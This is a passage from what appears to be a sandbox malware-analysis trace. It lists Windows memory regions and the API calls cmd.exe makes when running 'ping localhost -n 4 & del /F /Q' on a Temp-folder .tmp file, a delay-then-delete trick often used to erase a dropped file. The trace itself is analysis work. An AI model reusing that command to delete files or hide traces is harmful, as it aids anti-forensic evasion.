	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1956
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 2488
	        start_va = 0x4c0000
	          end_va = 0x4cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004c0000"
	        filename = ""

Region:
	              id = 2489
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2490
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2491
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2492
	        start_va = 0x5270000
	          end_va = 0x536ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005270000"
	        filename = ""

Region:
	              id = 4453
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4454
	        start_va = 0x400000
	          end_va = 0x4bdfff
	     entry_point = 0x400000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4455
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4456
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4457
	        start_va = 0x7efc0000
	          end_va = 0x7f0bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007efc0000"
	        filename = ""

Region:
	              id = 4458
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4459
	        start_va = 0x4d0000
	          end_va = 0x5cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004d0000"
	        filename = ""

Region:
	              id = 4460
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4461
	        start_va = 0x1040000
	          end_va = 0x104ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001040000"
	        filename = ""

Region:
	              id = 4462
	        start_va = 0xf40000
	          end_va = 0xf43fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f40000"
	        filename = ""

Region:
	              id = 4463
	        start_va = 0xf50000
	          end_va = 0xf53fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f50000"
	        filename = ""

Region:
	              id = 4475
	        start_va = 0x5370000
	          end_va = 0x56a6fff
	     entry_point = 0x5370000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 111
	os_tid = 0xd38

	[0118.673] GetModuleHandleA (lpModuleName=0x0) returned 0x10b0000
	[0118.673] __set_app_type (_Type=0x1) 
	[0118.673] __p__fmode () returned 0x74874d6c
	[0118.673] __p__commode () returned 0x74875b1c
	[0118.673] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x10c5200) returned 0x0
	[0118.674] __getmainargs (in: _Argc=0x10d60e8, _Argv=0x10d60ec, _Env=0x10d60f0, _DoWildCard=0, _StartInfo=0x10d60fc | out: _Argc=0x10d60e8, _Argv=0x10d60ec, _Env=0x10d60f0) returned 0
	[0118.674] GetCurrentThreadId () returned 0xd38
	[0118.674] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd38) returned 0x84
	[0118.674] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x765a0000
	[0118.674] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadUILanguage") returned 0x765e2510
	[0118.674] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0118.693] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0118.693] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f9f0 | out: phkResult=0x18f9f0*=0x0) returned 0x2
	[0118.693] VirtualQuery (in: lpAddress=0x18f9f7, lpBuffer=0x18f9a8, dwLength=0x1c | out: lpBuffer=0x18f9a8*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0118.693] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f9a8, dwLength=0x1c | out: lpBuffer=0x18f9a8*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0118.693] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f9a8, dwLength=0x1c | out: lpBuffer=0x18f9a8*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0118.693] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f9a8, dwLength=0x1c | out: lpBuffer=0x18f9a8*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0118.693] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f9a8, dwLength=0x1c | out: lpBuffer=0x18f9a8*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0118.693] GetConsoleOutputCP () returned 0x1b5
	[0118.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10df460 | out: lpCPInfo=0x10df460) returned 1
	[0118.694] SetConsoleCtrlHandler (HandlerRoutine=0x10d0e40, Add=1) returned 1
	[0118.694] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0118.694] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1
	[0118.694] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0118.694] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x10df40c | out: lpMode=0x10df40c) returned 1
	[0118.694] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0118.694] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0118.694] _get_osfhandle (_FileHandle=0) returned 0x38
	[0118.694] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x10df408 | out: lpMode=0x10df408) returned 1
	[0118.694] _get_osfhandle (_FileHandle=0) returned 0x38
	[0118.694] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1
	[0118.695] GetEnvironmentStringsW () returned 0x5278228*
	[0118.695] FreeEnvironmentStringsA (penv="=") returned 1
	[0118.695] GetEnvironmentStringsW () returned 0x5278228*
	[0118.695] FreeEnvironmentStringsA (penv="=") returned 1
	[0118.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e954 | out: phkResult=0x18e954*=0x94) returned 0x0
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x0, lpData=0x18e960*=0x70, lpcbData=0x18e958*=0x1000) returned 0x2
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x1, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x0, lpData=0x18e960*=0x1, lpcbData=0x18e958*=0x1000) returned 0x2
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x0, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x40, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x40, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.695] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x0, lpData=0x18e960*=0x40, lpcbData=0x18e958*=0x1000) returned 0x2
	[0118.696] RegCloseKey (hKey=0x94) returned 0x0
	[0118.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e954 | out: phkResult=0x18e954*=0x94) returned 0x0
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x0, lpData=0x18e960*=0x40, lpcbData=0x18e958*=0x1000) returned 0x2
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x1, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x0, lpData=0x18e960*=0x1, lpcbData=0x18e958*=0x1000) returned 0x2
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x0, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x9, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x4, lpData=0x18e960*=0x9, lpcbData=0x18e958*=0x4) returned 0x0
	[0118.696] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e95c, lpData=0x18e960, lpcbData=0x18e958*=0x1000 | out: lpType=0x18e95c*=0x0, lpData=0x18e960*=0x9, lpcbData=0x18e958*=0x1000) returned 0x2
	[0118.696] RegCloseKey (hKey=0x94) returned 0x0
	[0118.696] time (in: timer=0x0 | out: timer=0x0) returned 0x5c12666e
	[0118.696] srand (_Seed=0x5c12666e) 
	[0118.696] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul"
	[0118.696] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul"
	[0118.696] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x10e7720 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0118.696] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x527a8a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b
	[0118.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0118.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a
	[0118.696] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0118.697] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0118.697] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0118.697] GetEnvironmentStringsW () returned 0x5278228*
	[0118.697] FreeEnvironmentStringsA (penv="=") returned 1
	[0118.697] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0118.697] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x10df4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0118.697] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0118.697] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0118.697] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0118.697] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0118.697] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0118.697] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0118.697] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0118.697] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0118.697] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f72c | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0118.698] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", nBufferLength=0x104, lpBuffer=0x18f72c, lpFilePart=0x18f724 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x18f724*="Desktop") returned 0x19
	[0118.698] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0118.698] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f4a8 | out: lpFindFileData=0x18f4a8) returned 0x5274690
	[0118.698] FindClose (in: hFindFile=0x5274690 | out: hFindFile=0x5274690) returned 1
	[0118.698] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi", lpFindFileData=0x18f4a8 | out: lpFindFileData=0x18f4a8) returned 0x5274690
	[0118.698] FindClose (in: hFindFile=0x5274690 | out: hFindFile=0x5274690) returned 1
	[0118.698] FindFirstFileW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop", lpFindFileData=0x18f4a8 | out: lpFindFileData=0x18f4a8) returned 0x5274690
	[0118.699] FindClose (in: hFindFile=0x5274690 | out: hFindFile=0x5274690) returned 1
	[0118.699] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 0x11
	[0118.699] SetCurrentDirectoryW (lpPathName="C:\\Users\\Nd9E1FYi\\Desktop" (normalized: "c:\\users\\nd9e1fyi\\desktop")) returned 1
	[0118.699] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\Nd9E1FYi\\Desktop") returned 1
	[0118.699] GetEnvironmentStringsW () returned 0x527aab0*
	[0118.699] FreeEnvironmentStringsA (penv="=") returned 1
	[0118.699] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x10e7720 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0118.699] GetConsoleOutputCP () returned 0x1b5
	[0118.700] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10df460 | out: lpCPInfo=0x10df460) returned 1
	[0118.700] GetUserDefaultLCID () returned 0x409
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x10e34a0, cchData=8 | out: lpLCData=":") returned 2
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f85c, cchData=128 | out: lpLCData="0") returned 2
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f85c, cchData=128 | out: lpLCData="0") returned 2
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f85c, cchData=128 | out: lpLCData="1") returned 2
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x10e34b0, cchData=8 | out: lpLCData="/") returned 2
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x10e3500, cchData=32 | out: lpLCData="Mon") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x10e3540, cchData=32 | out: lpLCData="Tue") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x10e3580, cchData=32 | out: lpLCData="Wed") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x10e35c0, cchData=32 | out: lpLCData="Thu") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x10e3600, cchData=32 | out: lpLCData="Fri") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x10e3640, cchData=32 | out: lpLCData="Sat") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x10e3680, cchData=32 | out: lpLCData="Sun") returned 4
	[0118.700] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x10e34c0, cchData=8 | out: lpLCData=".") returned 2
	[0118.701] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x10e34e0, cchData=8 | out: lpLCData=",") returned 2
	[0118.701] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0118.702] GetConsoleTitleW (in: lpConsoleTitle=0x5278f50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0118.762] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x765a0000
	[0118.762] GetProcAddress (hModule=0x765a0000, lpProcName="CopyFileExW") returned 0x765bffc0
	[0118.762] GetProcAddress (hModule=0x765a0000, lpProcName="IsDebuggerPresent") returned 0x765bb0b0
	[0118.762] GetProcAddress (hModule=0x765a0000, lpProcName="SetConsoleInputExeNameW") returned 0x775db440
	[0118.762] _wcsicmp (_String1="ping", _String2=")") returned 71
	[0118.762] _wcsicmp (_String1="FOR", _String2="ping") returned -10
	[0118.762] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10
	[0118.762] _wcsicmp (_String1="IF", _String2="ping") returned -7
	[0118.762] _wcsicmp (_String1="IF/?", _String2="ping") returned -7
	[0118.762] _wcsicmp (_String1="REM", _String2="ping") returned 2
	[0118.762] _wcsicmp (_String1="REM/?", _String2="ping") returned 2
	[0118.763] _wcsicmp (_String1="del", _String2=")") returned 59
	[0118.763] _wcsicmp (_String1="FOR", _String2="del") returned 2
	[0118.763] _wcsicmp (_String1="FOR/?", _String2="del") returned 2
	[0118.763] _wcsicmp (_String1="IF", _String2="del") returned 5
	[0118.763] _wcsicmp (_String1="IF/?", _String2="del") returned 5
	[0118.763] _wcsicmp (_String1="REM", _String2="del") returned 14
	[0118.763] _wcsicmp (_String1="REM/?", _String2="del") returned 14
	[0118.765] GetConsoleTitleW (in: lpConsoleTitle=0x18f4e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0118.902] _wcsicmp (_String1="ping", _String2="DIR") returned 12
	[0118.902] _wcsicmp (_String1="ping", _String2="ERASE") returned 11
	[0118.902] _wcsicmp (_String1="ping", _String2="DEL") returned 12
	[0118.902] _wcsicmp (_String1="ping", _String2="TYPE") returned -4
	[0118.902] _wcsicmp (_String1="ping", _String2="COPY") returned 13
	[0118.902] _wcsicmp (_String1="ping", _String2="CD") returned 13
	[0118.902] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13
	[0118.902] _wcsicmp (_String1="ping", _String2="RENAME") returned -2
	[0118.902] _wcsicmp (_String1="ping", _String2="REN") returned -2
	[0118.902] _wcsicmp (_String1="ping", _String2="ECHO") returned 11
	[0118.902] _wcsicmp (_String1="ping", _String2="SET") returned -3
	[0118.902] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8
	[0118.902] _wcsicmp (_String1="ping", _String2="DATE") returned 12
	[0118.902] _wcsicmp (_String1="ping", _String2="TIME") returned -4
	[0118.902] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9
	[0118.902] _wcsicmp (_String1="ping", _String2="MD") returned 3
	[0118.902] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3
	[0118.902] _wcsicmp (_String1="ping", _String2="RD") returned -2
	[0118.902] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2
	[0118.902] _wcsicmp (_String1="ping", _String2="PATH") returned 8
	[0118.903] _wcsicmp (_String1="ping", _String2="GOTO") returned 9
	[0118.903] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3
	[0118.903] _wcsicmp (_String1="ping", _String2="CLS") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="CALL") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6
	[0118.903] _wcsicmp (_String1="ping", _String2="VER") returned -6
	[0118.903] _wcsicmp (_String1="ping", _String2="VOL") returned -6
	[0118.903] _wcsicmp (_String1="ping", _String2="EXIT") returned 11
	[0118.903] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3
	[0118.903] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11
	[0118.903] _wcsicmp (_String1="ping", _String2="TITLE") returned -4
	[0118.903] _wcsicmp (_String1="ping", _String2="START") returned -3
	[0118.903] _wcsicmp (_String1="ping", _String2="DPATH") returned 12
	[0118.903] _wcsicmp (_String1="ping", _String2="KEYS") returned 5
	[0118.903] _wcsicmp (_String1="ping", _String2="MOVE") returned 3
	[0118.903] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12
	[0118.903] _wcsicmp (_String1="ping", _String2="POPD") returned -6
	[0118.903] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15
	[0118.903] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10
	[0118.903] _wcsicmp (_String1="ping", _String2="BREAK") returned 14
	[0118.903] _wcsicmp (_String1="ping", _String2="COLOR") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3
	[0118.903] _wcsicmp (_String1="ping", _String2="DIR") returned 12
	[0118.903] _wcsicmp (_String1="ping", _String2="ERASE") returned 11
	[0118.903] _wcsicmp (_String1="ping", _String2="DEL") returned 12
	[0118.903] _wcsicmp (_String1="ping", _String2="TYPE") returned -4
	[0118.903] _wcsicmp (_String1="ping", _String2="COPY") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="CD") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="RENAME") returned -2
	[0118.903] _wcsicmp (_String1="ping", _String2="REN") returned -2
	[0118.903] _wcsicmp (_String1="ping", _String2="ECHO") returned 11
	[0118.903] _wcsicmp (_String1="ping", _String2="SET") returned -3
	[0118.903] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8
	[0118.903] _wcsicmp (_String1="ping", _String2="DATE") returned 12
	[0118.903] _wcsicmp (_String1="ping", _String2="TIME") returned -4
	[0118.903] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9
	[0118.903] _wcsicmp (_String1="ping", _String2="MD") returned 3
	[0118.903] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3
	[0118.903] _wcsicmp (_String1="ping", _String2="RD") returned -2
	[0118.903] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2
	[0118.903] _wcsicmp (_String1="ping", _String2="PATH") returned 8
	[0118.903] _wcsicmp (_String1="ping", _String2="GOTO") returned 9
	[0118.903] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3
	[0118.903] _wcsicmp (_String1="ping", _String2="CLS") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="CALL") returned 13
	[0118.903] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6
	[0118.903] _wcsicmp (_String1="ping", _String2="VER") returned -6
	[0118.904] _wcsicmp (_String1="ping", _String2="VOL") returned -6
	[0118.904] _wcsicmp (_String1="ping", _String2="EXIT") returned 11
	[0118.904] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3
	[0118.904] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11
	[0118.904] _wcsicmp (_String1="ping", _String2="TITLE") returned -4
	[0118.904] _wcsicmp (_String1="ping", _String2="START") returned -3
	[0118.904] _wcsicmp (_String1="ping", _String2="DPATH") returned 12
	[0118.904] _wcsicmp (_String1="ping", _String2="KEYS") returned 5
	[0118.904] _wcsicmp (_String1="ping", _String2="MOVE") returned 3
	[0118.904] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12
	[0118.904] _wcsicmp (_String1="ping", _String2="POPD") returned -6
	[0118.904] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15
	[0118.904] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10
	[0118.904] _wcsicmp (_String1="ping", _String2="BREAK") returned 14
	[0118.904] _wcsicmp (_String1="ping", _String2="COLOR") returned 13
	[0118.904] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3
	[0118.904] _wcsicmp (_String1="ping", _String2="FOR") returned 10
	[0118.904] _wcsicmp (_String1="ping", _String2="IF") returned 7
	[0118.904] _wcsicmp (_String1="ping", _String2="REM") returned -2
	[0118.904] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13
	[0118.918] SetErrorMode (uMode=0x0) returned 0x0
	[0118.918] SetErrorMode (uMode=0x1) returned 0x0
	[0118.918] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52705d0, lpFilePart=0x18eff4 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x18eff4*="Desktop") returned 0x19
	[0118.919] SetErrorMode (uMode=0x0) returned 0x1
